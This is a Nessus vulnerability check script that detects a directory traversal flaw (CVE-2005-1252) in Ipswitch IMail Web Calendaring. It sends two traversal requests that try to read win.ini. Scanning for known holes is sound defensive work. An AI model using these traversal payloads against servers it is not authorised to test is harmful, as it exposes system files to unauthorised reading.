#
# This script is (c) Tenable Network Security
#

if(description)
{
 script_id(18368);
 script_version("$Revision: 1.6 $");

 script_cve_id("CVE-2005-1252");
 script_bugtraq_id(13727);

 name["english"] = "Ipswitch Imail WebCalendar Directory Traversal Vulnerability";
 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote web server is prone to a directory traversal attack. 

Description :

The remote server is running Ipswitch IMail Web calendaring. 

The remote version of this software is vulnerable to a directory
traversal vulnerability.  An attacker, exploiting this vulnerability,
may be able to retrieve sensitive files present on the server. 

See also :

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=242
http://www.securityfocus.com/archive/1/400545
http://www.nessus.org/u?1d4dce96

Solution:

Apply IMail Server 8.2 Hotfix 2 or later. 

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


 script_description(english:desc["english"]);
 
 summary["english"] = "Ipswitch Imail WebCalendar Directory Traversal Vulnerability";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2005-2007 Tenable Network Security");
 family["english"] = "Web Servers";
 script_family(english:family["english"]);
 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 8484);
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:8484);
if(! get_port_state(port)) exit(0);

banner = get_http_banner (port:port);

if ("Ipswitch Web Calendaring" >!< banner)
  exit (0);

r[0] = "nessus.jsp?\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini";
r[1] = "nessus.jsp?\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini";


for (i=0; i < 2; i++)
{
  if (check_win_dir_trav_ka(port: port, url: r[i]))
  {
    security_warning(port);
    exit(0);
  }
}
